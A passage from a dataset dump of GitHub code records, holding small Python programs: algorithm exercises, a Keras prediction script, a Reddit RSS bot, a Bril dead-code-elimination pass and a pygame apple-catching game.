\"))\n \n print( int(recur(2**n)))","repo_name":"lyh951212/algorithm","sub_path":"recursion/baekjoon_1074.py","file_name":"baekjoon_1074.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"966299417","text":"import os\nimport sys\nimport numpy as np\nimport keras\nfrom keras.models import load_model\nfrom keras.preprocessing import sequence\n\ndef indexing_testing_data(testing_data_path, testing_data_index_path, dict_path):\n d = read_dict(dict_path)\n print('Indexing testing data ... 
')\n with open(testing_data_path, 'r') as test_data:\n all_index_text = []\n test_data.readline()\n counter = 0\n for line in test_data:\n counter += 1\n first_comma = line.index(',')\n index = line.strip()[:first_comma]\n text = line.strip()[first_comma+1:]\n index_text = ''\n words = text.split(' ')\n for word in words:\n if word in d:\n index_text += str(d.index(word) + 1) +' '\n else:\n index_text += str(1) +' ' \n all_index_text.append(index_text.strip())\n if os.path.isfile(testing_data_index_path):\n os.remove(testing_data_index_path)\n with open(testing_data_index_path, 'a') as index_data:\n index = 0\n for index_text in all_index_text:\n index_data.write(str(index) +','+ index_text +'\\r\\n')\n index += 1\n return None\n\ndef read_test_data(testing_data_index_path):\n x = []\n with open(testing_data_index_path, 'r') as test_data:\n for line in test_data:\n index, text = line.strip().split(',')\n x.append(list(map(int, text.split(' '))))\n return x\n\ndef write_answer(pred, answer_path):\n if os.path.isfile(answer_path):\n os.remove(answer_path)\n with open(answer_path, 'a') as answer:\n index = 0\n answer.write('id,label\\r\\n')\n for score in pred:\n if score >= 0.5:\n answer.write(str(index) +',1\\r\\n')\n else:\n answer.write(str(index) +',0\\r\\n')\n index += 1 \n\ndef read_dict(dict_path):\n d = []\n with open(dict_path, 'r') as dict_txt:\n for line in dict_txt:\n d.append(line.strip())\n return d\n\ndef main():\n testing_data_path = sys.argv[1]\n answer_path = sys.argv[2]\n testing_data_index_path = './testing_data_index.txt'\n model_path = './model_7.h5?dl=1'\n dict_path = './dict.txt'\n max_review_length = 30\n indexing_testing_data(testing_data_path, testing_data_index_path, dict_path)\n x_test = read_test_data(testing_data_index_path)\n x_test = sequence.pad_sequences(x_test, maxlen=max_review_length, padding='post')\n model = load_model(model_path)\n pred = model.predict(x_test)\n write_answer(pred, answer_path)\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"csdai0324/NTU_Machine_Learning_2017_FALL","sub_path":"hw4/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74894243571","text":"#!/usr/bin/env python\n\nimport config\nimport feedparser\nimport praw\nimport time\n\n\nclass Reddit(object):\n\n def __init__(self):\n self.reddit = praw.Reddit(\n client_id=config.REDDIT_CLIENT_ID,\n client_secret=config.REDDIT_CLIENT_SECRET,\n username=config.REDDIT_USERNAME,\n password=config.REDDIT_PASSWORD,\n user_agent='RSS to reddit post script'\n )\n\n def submit(self, sub, entries):\n subreddit = self.reddit.subreddit(sub)\n for title, url in entries.iteritems():\n try:\n subreddit.submit(\n title,\n url=url,\n resubmit=False,\n send_replies=False\n )\n except praw.exceptions.APIException:\n pass\n\n\ndef getFeedEntries(url):\n entries = dict()\n feed = feedparser.parse(url)\n for item in feed.entries:\n entries[item.title] = item.link\n return entries\n\n\ndef main():\n reddit = Reddit()\n\n while True:\n for subreddit, feed_url in config.FEEDS.iteritems():\n entries = getFeedEntries(feed_url)\n reddit.submit(subreddit, entries)\n\n time.sleep(config.RUN_FREQUENCY_MINS * 60)\n\n\nif __name__ == '__main__':\n 
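# Note: with resubmit=False, praw raises an APIException for a URL that has\n # already been submitted to the subreddit; Reddit.submit() above catches and\n # ignores it, which is how feed entries posted on an earlier pass get skipped.\n 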
main()\n","repo_name":"austen0/gists","sub_path":"reddit-rss-bot.py","file_name":"reddit-rss-bot.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72483964213","text":"import random as rnd\nby = {'Пушкин':'1799', 'Лермонтов':'1814', 'Ломоносов':'1711', 'Циолковский':'1857', 'Путин':'1952'}\n# Correct answers: 'Пушкин' - 1799, 'Лермонтов' - 1814, 'Ломоносов' - 1711, 'Циолковский' - 1857, 'Путин' - 1952\ncnt = len(by)\nrepeat = True\nwhile repeat:\n\tar = rnd.sample(range(cnt),cnt)\n\tcorrect = 0\n\tkeys = list(by)\n\tfor i in ar:\n\t\tg = input('In which year was {} born? '.format(keys[i]))\n\t\tcorrect += g == by[keys[i]]\n\tprint('Number of correct answers:', correct)\n\tprint('Number of mistakes:', cnt - correct)\n\tprint('Percentage of correct answers:', correct/cnt*100)\n\tprint('Percentage of incorrect answers:', (1-correct/cnt)*100)\n\trepeat = input('Start the game over (yes/no)? ') == 'yes'\n","repo_name":"piligrim7/lesson_02","sub_path":"victory.py","file_name":"victory.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5580585540","text":"from copy import deepcopy\nfrom collections import OrderedDict\nimport click\nimport sys\nimport json\n\nfrom ssa import bril_to_ssa, is_ssa\nfrom dominator_utilities import build_dominance_frontier_w_cfg, get_backedges_w_cfg, get_dominators_w_cfg, build_dominance_tree_w_cfg\nfrom cfg import (form_blocks, join_blocks,\n form_cfg_w_blocks, add_unique_exit_to_cfg, reverse_cfg, INSTRS, SUCCS, PREDS)\nfrom bril_core_constants import *\nfrom bril_core_utilities import *\n\n\n# ---------- MARK SWEEP DEAD CODE ELIMINATIONS -------------\n\n\nMARKED = True\nNOT_MARKED = not MARKED\n\n\ndef is_critical(instr):\n return is_io(instr) or is_call(instr) or is_ret(instr)\n\n\ndef find_nearest_useful_rec(curr_block, useful_post_dominators, post_dominator_tree):\n children = post_dominator_tree[curr_block]\n for c in children:\n if c in useful_post_dominators:\n return c\n else:\n result = find_nearest_useful_rec(\n c, useful_post_dominators, post_dominator_tree)\n if result != None:\n return result\n return None\n\n\ndef find_nearest_useful_post_dominator(curr_block, useful_blocks, post_dominating_blocks, post_dominator_tree):\n useful_post_dominators = list(\n set(useful_blocks).intersection(\n set(post_dominating_blocks)\n )\n )\n if useful_post_dominators == []:\n return None\n return find_nearest_useful_rec(curr_block, useful_post_dominators, post_dominator_tree)\n\n\ndef function_mark_sweep(func):\n \"\"\"\n ASSUMES SSA FORM\n https://yunmingzhang.files.wordpress.com/2013/12/dcereport-2.pdf\n \"\"\"\n # set up data structures\n cfg = form_cfg_w_blocks(func)\n cfg_w_exit = add_unique_exit_to_cfg(cfg, UNIQUE_CFG_EXIT)\n cdg = reverse_cfg(cfg_w_exit)\n _, post_dominated_by = get_dominators_w_cfg(cdg, UNIQUE_CFG_EXIT)\n post_dominator_tree = build_dominance_tree_w_cfg(cdg, UNIQUE_CFG_EXIT)\n post_dominator_frontier = build_dominance_frontier_w_cfg(\n cdg, UNIQUE_CFG_EXIT)\n\n # initialize\n id2instr = dict()\n id2block = dict()\n id2mark = dict()\n def2id = dict()\n useful_blocks = set()\n worklist = []\n for block in cfg:\n for instr in cfg[block][INSTRS]:\n instr_id = id(instr)\n if is_critical(instr):\n worklist.append(instr_id)\n id2mark[instr_id] = MARKED\n useful_blocks.add(block)\n else:\n id2mark[instr_id] = NOT_MARKED\n if DEST in instr:\n 
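# in SSA form every variable has exactly one definition, so mapping\n # each dest to a single defining instruction id is well-defined\n 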
def2id[instr[DEST]] = instr_id\n id2instr[instr_id] = instr\n id2block[instr_id] = block\n\n # mark phase\n while worklist != []:\n current_inst_id = worklist.pop()\n current_inst = id2instr[current_inst_id]\n if ARGS in current_inst:\n for defining in current_inst[ARGS]:\n def_id = def2id[defining]\n if id2mark[def_id] == NOT_MARKED:\n id2mark[def_id] = MARKED\n useful_blocks.add(id2block[def_id])\n worklist.append(def_id)\n\n curr_block = id2block[current_inst_id]\n for rdf_block in post_dominator_frontier[curr_block]:\n last_instr = None\n for block_instr in reversed(cfg[rdf_block][INSTRS]):\n last_instr = block_instr\n break\n if last_instr != None:\n last_instr_id = id(last_instr)\n id2mark[last_instr_id] = MARKED\n useful_blocks.add(id2block[last_instr_id])\n worklist.append(last_instr_id)\n\n # sweep phase\n final_instrs = []\n for instr in func[INSTRS]:\n instr_id = id(instr)\n if id2mark[instr_id] == MARKED:\n final_instrs.append(instr)\n else:\n if is_br(instr):\n # replace branch to jmp to nearest useful post dominator\n curr_block = id2block[instr_id]\n post_dominating_blocks = list(\n set(post_dominated_by[curr_block]) - {curr_block})\n nearest = find_nearest_useful_post_dominator(\n curr_block, useful_blocks, post_dominating_blocks, post_dominator_tree)\n if nearest != None:\n new_jmp = {OP: JMP, LABELS: [nearest]}\n final_instrs.append(new_jmp)\n elif is_label(instr):\n final_instrs.append(instr)\n elif is_jmp(instr):\n final_instrs.append(instr)\n else:\n # deleted\n pass\n return final_instrs\n\n\ndef mark_sweep_dce(program):\n \"\"\"\n Implementation of Mark Sweep Style DCE to remove more dead code. Meant to\n work in conjunction with SSA code.\n\n Can be run alongside other passes with lvn/gvn.\n \"\"\"\n try:\n is_ssa(program)\n except:\n program = bril_to_ssa(program)\n for func in program[FUNCTIONS]:\n new_instrs = function_mark_sweep(func)\n func[INSTRS] = new_instrs\n is_ssa(program)\n return program\n\n\n# ---------- AGGRESSIVE DEAD CODE ELIMINATIONS -------------\n\n\nUNIQUE_CFG_EXIT = \"UNIQUE.EXIT\"\n\nLIVE = True\nNOT_LIVE = not LIVE\n\n\ndef func_has_side_effects():\n \"\"\"\n This is also incorrect, in that if a function has no side effects\n that does not mean it can be removed;\n in particular, one could have a function that is a simple infinite loop.\n These should be kept!\n \"\"\"\n pass\n\n\ndef function_safe_adce(func):\n \"\"\"\n From: http://www.cs.cmu.edu/afs/cs/academic/class/15745-s12/public/lectures/L14-SSA-Optimizations-1up.pdf\n Mark all instructions as Live that are:\n I/O\n Store into memory TODO: when Bril has memory instructions\n Terminator - RET\n Calls a function with side effects (e.g. most functions)\n Label\n\n Conservative Safer version of ADCE\n Keeps all Labels in Graph\n When an instruction in a block is live, add the terminator to that block automatically, e.g. 
jmp, ret, br\n When a backedge is detected heading in a block, add the terminator for the other block heading into this block\n - This keeps all loops in the program\n - Does not remove infinite loops that do nothing.\n - Use backedge detector for this\n \"\"\"\n # build important auxillary data structures (READ-ONLY)\n instrs = func[INSTRS]\n\n cfg = form_cfg_w_blocks(func)\n entry = list(cfg.keys())[0]\n cfg_w_exit = add_unique_exit_to_cfg(cfg, UNIQUE_CFG_EXIT)\n backedge_start_blocks = set(\n list(map(lambda pair: pair[1], get_backedges_w_cfg(cfg, entry))))\n cdg = reverse_cfg(cfg_w_exit)\n cdg[entry][PREDS].append(UNIQUE_CFG_EXIT)\n cdg[UNIQUE_CFG_EXIT][SUCCS].append(entry)\n control_dependence = build_dominance_frontier_w_cfg(cdg, UNIQUE_CFG_EXIT)\n\n # initialize data structures (WRITE TO)\n id2instr = OrderedDict()\n id2block = OrderedDict()\n def2id = OrderedDict()\n for block in cfg:\n for instr in cfg[block][INSTRS]:\n id2instr[id(instr)] = instr\n if DEST in instr:\n def2id[instr[DEST]] = id(instr)\n id2block[id(instr)] = block\n\n # initialize worklist\n marked_instrs = {id(instr): NOT_LIVE for instr in instrs}\n worklist = []\n for instr in instrs:\n curr_block = id2block[id(instr)]\n if is_io(instr) or is_ret(instr) or is_jmp(instr) or is_call(instr):\n # mark current instr as live\n marked_instrs[id(instr)] = LIVE\n # add arguments of current instr as live\n if ARGS in instr:\n for a in instr[ARGS]:\n # add only if not an argument of the function\n if a in def2id:\n worklist.append(def2id[a])\n # add terminator for block for current instr\n for instr in reversed(cfg[curr_block][INSTRS]):\n if is_terminator(instr):\n worklist.append(id(instr))\n # add the control dependency parent of this instruction's block\n for cd_block in control_dependence[curr_block]:\n for instr in reversed(cfg[cd_block][INSTRS]):\n if is_terminator(instr):\n worklist.append(id(instr))\n # add terminators for any start of a backedge\n if curr_block in backedge_start_blocks:\n for instr in reversed(cfg[curr_block][INSTRS]):\n if is_terminator(instr):\n worklist.append(id(instr))\n\n # DO WORKLIST\n while worklist != []:\n instr_id = worklist.pop()\n if marked_instrs[instr_id] == LIVE:\n continue\n # Grab Operands of S\n marked_instrs[instr_id] = LIVE\n # add arguments of current_instr\n instr = id2instr[instr_id]\n if ARGS in instr:\n for a in instr[ARGS]:\n # add only if not an argument of the function\n if a in def2id:\n worklist.append(def2id[a])\n # add terminator for block for current instr\n curr_block = id2block[instr_id]\n for inner_instr in reversed(cfg[curr_block][INSTRS]):\n if is_terminator(inner_instr):\n worklist.append(id(inner_instr))\n # add the control dependency parent of this instruction's block\n for cd_block in control_dependence[curr_block]:\n for inner_instr in reversed(cfg[cd_block][INSTRS]):\n if is_terminator(inner_instr):\n worklist.append(id(inner_instr))\n # add terminators for any start of a backedge\n if curr_block in backedge_start_blocks:\n for inner_instr in reversed(cfg[curr_block][INSTRS]):\n if is_terminator(inner_instr):\n worklist.append(id(inner_instr))\n\n # FINISH by keeping alive instructions\n final_instrs = []\n for instr_id in marked_instrs:\n if marked_instrs[instr_id] == LIVE:\n final_instrs.append(id2instr[instr_id])\n elif is_label(id2instr[instr_id]):\n final_instrs.append(id2instr[instr_id])\n return final_instrs\n\n\ndef function_adce(func):\n \"\"\"\n From: 
http://www.cs.cmu.edu/afs/cs/academic/class/15745-s12/public/lectures/L14-SSA-Optimizations-1up.pdf\n Mark all instructions as Live that are:\n I/O\n Store into memory TODO: when Bril has memory instructions\n Terminator - RET\n Calls a function with side effects (e.g. most functions)\n Label\n\n NOTE: This algorithm is actually incorrect in that for infinite loops\n that do not have I/O or memory access or function call, the loop gets entirely\n eliminated. This is a consequence of the no-use conditions that are searched for.\n \"\"\"\n # build important auxiliary data structures (READ-ONLY)\n instrs = func[INSTRS]\n\n cfg = form_cfg_w_blocks(func)\n entry = list(cfg.keys())[0]\n cfg_w_exit = add_unique_exit_to_cfg(cfg, UNIQUE_CFG_EXIT)\n cdg = reverse_cfg(cfg_w_exit)\n cdg[entry][PREDS].append(UNIQUE_CFG_EXIT)\n cdg[UNIQUE_CFG_EXIT][SUCCS].append(entry)\n control_dependence = build_dominance_frontier_w_cfg(cdg, UNIQUE_CFG_EXIT)\n\n # initialize data structures (WRITE TO)\n id2instr = OrderedDict()\n id2block = OrderedDict()\n def2id = OrderedDict()\n for block in cfg:\n for instr in cfg[block][INSTRS]:\n id2instr[id(instr)] = instr\n if DEST in instr:\n def2id[instr[DEST]] = id(instr)\n id2block[id(instr)] = block\n\n # initialize worklist\n marked_instrs = {id(instr): NOT_LIVE for instr in instrs}\n worklist = []\n for instr in instrs:\n if is_io(instr) or is_jmp(instr) or is_ret(instr) or is_call(instr):\n marked_instrs[id(instr)] = LIVE\n if ARGS in instr:\n for a in instr[ARGS]:\n # add only if not an argument of the function\n if a in def2id:\n worklist.append(def2id[a])\n # add the control dependency parent of this instruction's block\n for cd_block in control_dependence[id2block[id(instr)]]:\n for instr in reversed(cfg[cd_block][INSTRS]):\n if is_terminator(instr):\n worklist.append(id(instr))\n\n # DO WORKLIST\n while worklist != []:\n instr_id = worklist.pop()\n if marked_instrs[instr_id] == LIVE:\n continue\n # Grab Operands of S\n marked_instrs[instr_id] = LIVE\n instr = id2instr[instr_id]\n if ARGS in instr:\n args = instr[ARGS]\n for a in args:\n # add only if not an argument of the function\n if a in def2id:\n worklist.append(def2id[a])\n\n for cd_block in control_dependence[id2block[instr_id]]:\n for instr in reversed(cfg[cd_block][INSTRS]):\n if is_terminator(instr):\n worklist.append(id(instr))\n\n # FINISH by keeping alive instructions\n final_instrs = []\n for instr_id in marked_instrs:\n if marked_instrs[instr_id] == LIVE:\n final_instrs.append(id2instr[instr_id])\n elif is_label(id2instr[instr_id]):\n final_instrs.append(id2instr[instr_id])\n return final_instrs\n\n\ndef global_adce(program):\n \"\"\"\n Aggressive Dead Code Elimination\n\n NOTE: The ADCE is actually incorrect in that for infinite loops\n that do not have I/O or memory access or function call, the loop gets entirely\n eliminated. 
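For instance, a self-contained (hypothetical) Bril fragment like\n\n i: int = const 0;\n .loop:\n one: int = const 1;\n i: int = add i one;\n jmp .loop;\n\n has no I/O, memory access or calls, so none of its instructions is ever\n marked live and the entire loop is removed. 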
This is a consequence of the no-use conditions that are searched for.\n\n NOTE: SAFE_ADCE should be conservatively sound\n \"\"\"\n try:\n is_ssa(program)\n except:\n program = bril_to_ssa(program)\n for func in program[FUNCTIONS]:\n new_instrs = function_safe_adce(func)\n func[INSTRS] = new_instrs\n is_ssa(program)\n return program\n\n\n# ---------- TRIVIAL DEAD CODE ELIMINATIONS -------------\n\n\ndef delete_unused_dce(program):\n \"\"\"\n Delete all instructions for which a variable is assigned but never read from.\n \"\"\"\n for func in program[\"functions\"]:\n written_variables = set()\n for instr in func[\"instrs\"]:\n if \"dest\" in instr:\n written_variables.add(instr[\"dest\"])\n\n for instr in func[\"instrs\"]:\n if \"args\" in instr:\n args = set(instr[\"args\"])\n written_variables -= args\n\n new_instrs = []\n for instr in func[\"instrs\"]:\n if \"dest\" in instr:\n if instr[\"dest\"] not in written_variables:\n new_instrs.append(instr)\n else:\n new_instrs.append(instr)\n\n func[\"instrs\"] = new_instrs\n\n return program\n\n\ndef local_dce(program):\n \"\"\"\n Eliminate instructions that are written over without being read, inside a\n basic block.\n \"\"\"\n for func in program[\"functions\"]:\n basic_blocks = form_blocks(func[\"instrs\"])\n new_basic_blocks = []\n for bb in basic_blocks:\n new_bb = []\n to_delete = []\n last_use = dict()\n for idx, instr in enumerate(bb):\n if \"args\" in instr:\n args = instr[\"args\"]\n for a in args:\n if a in last_use:\n (def_idx, _) = last_use[a]\n last_use[a] = (def_idx, idx)\n if \"dest\" in instr:\n dst = instr[\"dest\"]\n if dst in last_use:\n (def_idx, use) = last_use[dst]\n if use == None:\n to_delete.append(def_idx)\n last_use[dst] = (idx, None)\n\n # This is in fact incorrect! A value in one bb not used can still be used later\n # as in the diamond patter. 
I leave it commented out as a lesson for myself.\n # for dst, (def_idx, last_use_idx) in last_use.items():\n # if last_use_idx == None:\n # to_delete.append(def_idx)\n\n for idx, instr in enumerate(bb):\n if idx not in to_delete:\n new_bb.append(instr)\n\n new_basic_blocks.append(new_bb)\n func[\"instrs\"] = join_blocks(new_basic_blocks)\n return program\n\n\ndef iterate_dce(program, dce_method):\n \"\"\"\n Iterates specified DCE method\n \"\"\"\n has_changed = True\n while has_changed:\n old_program = deepcopy(program)\n program = dce_method(program)\n has_changed = not (program == old_program)\n\n return program\n\n\ndef dce(program, global_delete, local_delete, adce, ms):\n \"\"\"\n Naive DCE wrapper method\n \"\"\"\n if bool(adce) == True:\n return global_adce(program)\n if bool(ms) == True:\n return mark_sweep_dce(program)\n if global_delete == None and local_delete == None:\n return iterate_dce(iterate_dce(program, local_dce), delete_unused_dce)\n elif global_delete == None and local_delete:\n return iterate_dce(program, local_dce)\n elif global_delete and local_delete == None:\n return iterate_dce(program, delete_unused_dce)\n return iterate_dce(iterate_dce(program, local_dce), delete_unused_dce)\n\n\n@click.command()\n@click.option('--global-delete', default=1, help='Delete Globally.')\n@click.option('--local-delete', default=1, help='Delete Locally.')\n@click.option('--adce', default=False, help='Delete Aggressively.')\n@click.option('--ms', default=False, help='Delete with Mark Sweep Algorithm.')\n@click.option('--pretty-print', default=False, help='Pretty Print Before and After Optimization.')\ndef main(global_delete, local_delete, adce, ms, pretty_print):\n prog = json.load(sys.stdin)\n if pretty_print:\n print(json.dumps(prog, indent=4, sort_keys=True))\n final_prog = dce(prog, global_delete, local_delete, adce, ms)\n if pretty_print:\n print(json.dumps(final_prog, indent=4, sort_keys=True))\n print(json.dumps(final_prog))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"JonathanDLTran/CS6120-Jonathan","sub_path":"dce.py","file_name":"dce.py","file_ext":"py","file_size_in_byte":18064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72775035894","text":"\nimport sys\ninput = sys.stdin.readline\nimport heapq\n\nn = int(input())\narr = [int(input()) for _ in range(n)]\ngraph = [[] for _ in range(n+1)]\nmatrix = [[] for _ in range(n+1)]\n\nfor i in range(n):\n graph[0].append((arr[i],i+1))\n \nfor i in range(1,n+1):\n nodes = [0]+list(map(int, input().split()))\n matrix[i] = nodes\n \nfor i in range(1,n):\n for j in range(i+1, n+1):\n # start, cost, end\n graph[i].append((matrix[i][j],j))\n graph[j].append((matrix[i][j],i))\n \nvisited = [True]+[False]*(n)\nq = graph[0]\nheapq.heapify(q)\nresult = 0\ncnt = 0\n\nwhile q:\n if cnt==n:\n break\n z,x = heapq.heappop(q)\n if not visited[x]:\n visited[x]=True\n cnt+=1\n result+=z\n for j in graph[x]: # if the connected end node has not been visited yet\n if not visited[j[1]]:\n heapq.heappush(q,j)\n\nprint(result)\n","repo_name":"JangAyeon/Algorithm","sub_path":"백준/Gold/1368. 
물대기/물대기-프림알고리즘.py","file_name":"물대기-프림알고리즘.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37216553981","text":"class Solution:\n def lengthOfLIS(self, nums: 'List[int]') -> int: # O( NlogN | N )\n def binFind(arr, v): # find the first one in arr >= v\n s = 0 \n e = len(arr) - 1 \n output = None\n while s <= e:\n mid = s - (s-e)//2\n if arr[mid] >= v:\n e = mid - 1\n output = mid\n else:\n s = mid + 1\n return output\n \n dp = []\n output = 0\n for n in nums: # to find the first one in the dp, >= current n\n if len(dp) == 0 or n > dp[-1]:\n dp.append(n)\n else:\n idx = binFind(dp, n)\n dp[idx] = n\n \n output = max(output, len(dp))\n \n return output\n \n\n\n\n\n# previous solution\n\n# class Solution:\n# def lengthOfLIS(self, nums: List[int]) -> int:\n# dp = [1] * len(nums)\n# for i in range(1, len(nums)):\n# for j in range(i-1, -1, -1):\n# if nums[j] < nums[i]:\n# dp[i] = max(dp[i], dp[j] + 1)\n# if nums[j] == nums[i]-1:\n# break\n \n# return max(dp)\n \n\n\n# previous solution\n\n# class Solution:\n# def lengthOfLIS(self, nums: 'List[int]') -> int:\n# if nums ==[]: return 0\n# else:\n# dp = [1]\n# for i in range(1, len(nums)):\n# m = 1\n# for j in range(i-1, -1, -1):\n# if nums[j] < nums[i]:\n# m = max(m, dp[j]+1)\n# dp.append(m)\n# return max(dp)\n\n\n\n# previous solution \n\n# class Solution:\n# def lengthOfLIS(self, nums: 'List[int]') -> int:\n# dp = [1] * len(nums)\n# ans = 1\n# for i in range(1, len(nums)):\n# for j in range(i-1, -1, -1):\n# if nums[j] < nums[i]:\n# dp[i] = max(dp[i], dp[j] + 1)\n# if nums[j] == nums[i]-1:\n# break\n# ans = max(ans, dp[i])\n# return ans\n\n\n# previous solution\n\n# class Solution:\n# def lengthOfLIS(self, nums: 'List[int]') -> int:\n# if len(nums) in [0,1]:\n# return len(nums)\n# long = [None] * len(nums)\n# long[0] = None\n\n# for i in range(len(nums)):\n# find = 1\n# tempMax = [-99]\n# for j in range(i, -1, -1):\n# if long[j] != None and nums[j]= SCREEN_HEIGHT - self.rect.height:\r\n self.rect.top = SCREEN_HEIGHT - self.rect.height\r\n else:\r\n self.rect.top = y\r\n if x < 0:\r\n self.rect.left = 0\r\n elif x > SCREEN_WIDTH - self.rect.width:\r\n self.rect.left = SCREEN_WIDTH - self.rect.width\r\n else:\r\n self.rect.left = x\r\n\r\n # catch bombs\r\n def picking_bomb(self, bomb_group1):\r\n # check whether a bomb was caught\r\n picked_bombs = pygame.sprite.spritecollide(self, bomb_group1, True)\r\n # the caught bomb disappears\r\n if picked_bombs:\r\n bomb_sound.play()\r\n global OVER_FLAG\r\n OVER_FLAG = True\r\n self.kill()\r\n\r\n # catch apples\r\n def picking_apple(self, app_group):\r\n\r\n # count how many apples were caught\r\n picked_apples = pygame.sprite.spritecollide(self, app_group, True)\r\n\r\n # add to the score\r\n self.apple_num += len(picked_apples)\r\n\r\n # the caught apples disappear\r\n for picked_apple in picked_apples:\r\n picked_apple.kill()\r\n\r\n apple_sound.set_volume(1.0)\r\n if picked_apples:\r\n apple_sound.set_volume(0.2)\r\n apple_sound.play()\r\n\r\n\r\n# Apple class\r\nclass Apple(pygame.sprite.Sprite):\r\n def __init__(self, app_surface, apple_pos):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image = app_surface\r\n self.rect = self.image.get_rect()\r\n self.rect.topleft = apple_pos\r\n self.speed = 1\r\n\r\n def update(self):\r\n global START_TIME\r\n if START_TIME is None:\r\n START_TIME = time.time()\r\n self.rect.top += (self.speed * (1 + (time.time() - START_TIME) / 40))\r\n if self.rect.top > SCREEN_HEIGHT:\r\n # an apple hit the ground, game over\r\n global OVER_FLAG\r\n OVER_FLAG = True\r\n self.kill()\r\n\r\n\r\n# Bomb class\r\nclass 
Bomb(pygame.sprite.Sprite):\r\n    def __init__(self, bomb1_surface, bomb_pos):\r\n        pygame.sprite.Sprite.__init__(self)\r\n        self.image = bomb1_surface\r\n        self.rect = self.image.get_rect()\r\n        self.rect.topleft = bomb_pos\r\n        self.speed = 1\r\n\r\n    def update(self):\r\n        global START_TIME\r\n        if START_TIME is None:\r\n            START_TIME = time.time()\r\n        self.rect.top += (self.speed * (1 + (time.time() - START_TIME) / 40))\r\n        if self.rect.top > SCREEN_HEIGHT:\r\n            # Bomb disappears when it hits the ground\r\n            self.kill()\r\n\r\n\r\n# # Initialize the game\r\n\r\npygame.init()\r\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\r\n# pygame.display.set_caption(\"Catch Apples\")\r\n\r\n# Load images\r\nbackground_surface = pygame.image.load(BACKGROUND_IMAGE_PATH).convert()\r\nbackground_surface2 = pygame.image.load(BACKGROUND_IMAGE_PATH2).convert()\r\nbackground_surface3 = pygame.image.load(BACKGROUND_IMAGE_PATH3).convert_alpha()\r\nmonkey_surface = pygame.image.load(MONKEY_IMAGE_PATH).convert_alpha()\r\napple_surface = pygame.image.load(APPLE_IMAGE_PATH).convert_alpha()\r\nbomb_surface1 = pygame.image.load(BOMB_IMAGE_PATH).convert_alpha()\r\n# Create the monkey\r\nmonkey = Monkey(monkey_surface, (200, 500))\r\n# Create the apple and bomb groups\r\napple_group = pygame.sprite.Group()\r\nbomb_group = pygame.sprite.Group()\r\n# Score font\r\nscore_font = pygame.font.SysFont(\"arial\", 40)\r\n\r\ngame_mode = None\r\nscore = None\r\n# Main menu\r\ndef main_menu():\r\n    global game_mode\r\n    font = pygame.font.SysFont(\"Georgia\", 40, bold=1)\r\n    start_text_surface = font.render(\"Press 'B' to Begin\", True, (255, 255, 255))\r\n    mode_text_surface = font.render(\"Press 'M' to Choose Mode\", True, (255, 255, 255))\r\n    while True:\r\n        screen.blit(background_surface, (0, 0))\r\n        screen.blit(start_text_surface, (200, 270))\r\n        screen.blit(mode_text_surface, (160, 320))\r\n        pygame.display.update()\r\n        for event in pygame.event.get():\r\n            if event.type == QUIT:\r\n                pygame.quit()\r\n                exit()\r\n            if event.type == KEYDOWN:\r\n                if event.key == K_b:\r\n                    return\r\n                elif event.key == K_m:\r\n                    return choose_game_mode()\r\n\r\n\r\ndef choose_game_mode():\r\n    font = pygame.font.SysFont(\"Georgia\", 50)\r\n    easy_text_surface = font.render(\"Press 'E' for Easy Mode\", True, (255, 255, 255))\r\n    hard_text_surface = font.render(\"Press 'H' for Hard Mode\", True, (255, 255, 255))\r\n    while True:\r\n        screen.blit(background_surface, (0, 0))\r\n        screen.blit(easy_text_surface, (120, 270))\r\n        screen.blit(hard_text_surface, (120, 320))\r\n        pygame.display.update()\r\n        for event in pygame.event.get():\r\n            if event.type == QUIT:\r\n                pygame.quit()\r\n                exit()\r\n            if event.type == KEYDOWN:\r\n                if event.key == K_e:\r\n                    return easy()\r\n                elif event.key == K_h:\r\n                    return hard_mode()\r\n# Print text\r\ndef print_text1(font2, x, y, text, color=(255, 255, 255)):\r\n    img_text = font2.render(text, True, color)\r\n    screen2 = pygame.display.get_surface()\r\n    screen2.blit(img_text, (x, y))\r\n\r\n# Sprite class\r\nclass MySprite(pygame.sprite.Sprite):\r\n    def __init__(self):\r\n        pygame.sprite.Sprite.__init__(self)\r\n        self.image = None  # add the image attribute\r\n        self.rect = None\r\n        self.master_image = None\r\n        self.frame = 0\r\n        self.old_frame = -1\r\n        self.frame_width = 1\r\n        self.frame_height = 1\r\n        self.first_frame = 0\r\n        self.last_frame = 0\r\n        self.columns = 1\r\n        self.last_time = 0\r\n        self.direction = 0\r\n        self.velocity = Point(0.0, 0.0)\r\n\r\n    def _getx(self):\r\n        return self.rect.x\r\n\r\n    def _setx(self, value):\r\n        self.rect.x = value\r\n\r\n    X = property(_getx, _setx)\r\n\r\n    def _gety(self):\r\n        return self.rect.y\r\n\r\n    def _sety(self, value):\r\n        
